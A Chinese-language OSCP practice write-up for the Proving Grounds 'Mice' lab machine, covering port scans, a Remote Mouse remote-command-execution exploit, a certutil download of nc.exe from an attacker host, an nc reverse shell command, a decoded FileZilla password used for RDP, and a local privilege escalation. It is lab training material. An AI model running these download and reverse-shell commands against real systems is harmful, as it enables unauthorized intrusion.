OSCP Mice Write-up

本文最后更新于 2026年3月12日 下午

一、靶场详情

靶场名称:

Mice

靶场地址:

OffSec Proving Grounds Practice 实验环境

二、思路总结

突破边界:

Remote Mouse 远程命令执行 –> 系统 divine 用户权限 –> 用户旗帜

权限提升:

FileZilla 配置文件密码解码 –> RDP 远程登录 –> Remote Mouse GUI 本地提权 –> 系统 system 权限 –> 管理员旗帜

三、靶场攻击演示

3.1 靶场信息收集

TCP 端口扫描:

1
2
3
4
5
6
7
8
sudo nmap -p- 192.168.134.199 --min-rate=2000

PORT     STATE SERVICE
1978/tcp open  unisql
1979/tcp open  unisql-java
1980/tcp open  pearldoc-xact
3389/tcp open  ms-wbt-server
7680/tcp open  pando-pub

UDP 端口扫描:未发现有价值信息。

TCP 服务信息搜集:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
sudo nmap -p1978,1979,1980,3389,7680 -sCV 192.168.134.199

PORT     STATE SERVICE        VERSION
1978/tcp open  remotemouse    Emote Remote Mouse
1979/tcp open  unisql-java?
1980/tcp open  pearldoc-xact?
3389/tcp open  ms-wbt-server  Microsoft Terminal Services
|_ssl-date: 2025-09-20T08:11:33+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2025-09-19T08:02:35
|_Not valid after:  2026-03-21T08:02:35
| rdp-ntlm-info:
|   Target_Name: REMOTE-PC
|   NetBIOS_Domain_Name: REMOTE-PC
|   NetBIOS_Computer_Name: REMOTE-PC
|   DNS_Domain_Name: Remote-PC
|   DNS_Computer_Name: Remote-PC
|   Product_Version: 10.0.19041
|_  System_Time: 2025-09-20T08:11:04+00:00
7680/tcp open  pando-pub?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

系统为 Windows 环境,开放有 remotemouse 和 RDP 服务。

3.2 渗透测试突破边界

3.2.1 Remote Mouse 远程命令执行漏洞

使用 searchsploit 检索 Emote Remote Mouse 历史漏洞,发现存在本地提权和远程命令执行漏洞。

1
searchsploit Emote Remote Mouse

复制远程命令执行利用脚本至当前路径,测试发现可正常执行计算器,说明漏洞存在。

1
2
searchsploit -m windows/remote/46697.py
python2 46697.py 192.168.134.199

修改脚本 payload 执行下载 nc 至 public 用户目录。

1
certutil -urlcache -split -f http://192.168.45.227/nc.exe C:\\Users\\Public\\nc.exe

再次修改脚本 payload 通过 nc 执行反弹 shell,得到系统 divine 用户 shell。

1
C:\\Users\\Public\\nc.exe 192.168.45.227 80 -e cmd.exe

实际执行起来并没有那么顺利,首先靶机设置有防火墙,出站规则禁用了多数端口,尝试过程只发现 80 端口可出站,高位端口基本都不行,其次命令执行过程时间较长,如果直接执行 powershell 反弹 shell 测试过程一直收不到回弹 shell。

3.2.2 用户旗帜获取

3.3 提权获取系统管理员权限

3.3.1 FileZilla 配置文件密码解码,得到 divine 用户密码

Remote Mouse 除了远程命令执行漏洞还存在本地提权漏洞,想利用本地提权需要首先需要得到 GUI 界面,靶机开放了 RDP 协议,如果可以得到 divine 用户密码就可以远程登录靶机,进而执行 Remote Mouse GUI 本地提权。

提权参考链接:

1
https://www.exploit-db.com/exploits/50047

靶机除了一些默认应用还安装了 FileZilla FTP 程序,搜索引擎检索 FileZilla FTP 密码解码,发现本地可能存在包含密码的配置文件。

经过一番查找,在 C:\Users\divine\AppData\Roaming\FileZilla 目录发现了 FileZilla xml 配置文件,包含有 divine 用户 base64 格式密码。

将 base64 密码解码,通过远程桌面登录靶机。

1
xfreerdp3 /u:divine /p:'ControlFreak11' /v:192.168.134.199 /clipboard /dynamic-resolution /cert:ignore /scale:180

3.3.2 Remote Mouse GUI 本地提权得到系统 system 权限

执行 Remote Mouse GUI 本地提权攻击步骤,得到系统 system 权限。

3.3.3 管理员旗帜获取

Thanks

如果我的文章对您有帮助或您希望与我更多交流,欢迎点击「关于我」,通过页面中的微信公众号、邮箱或 Discord 与我联系;若您发现文章中存在任何错误或不足之处,也非常欢迎通过以上方式指出,在此一并致以衷心的感谢。 😊🫡

最后,祝您生活愉快!🌞✨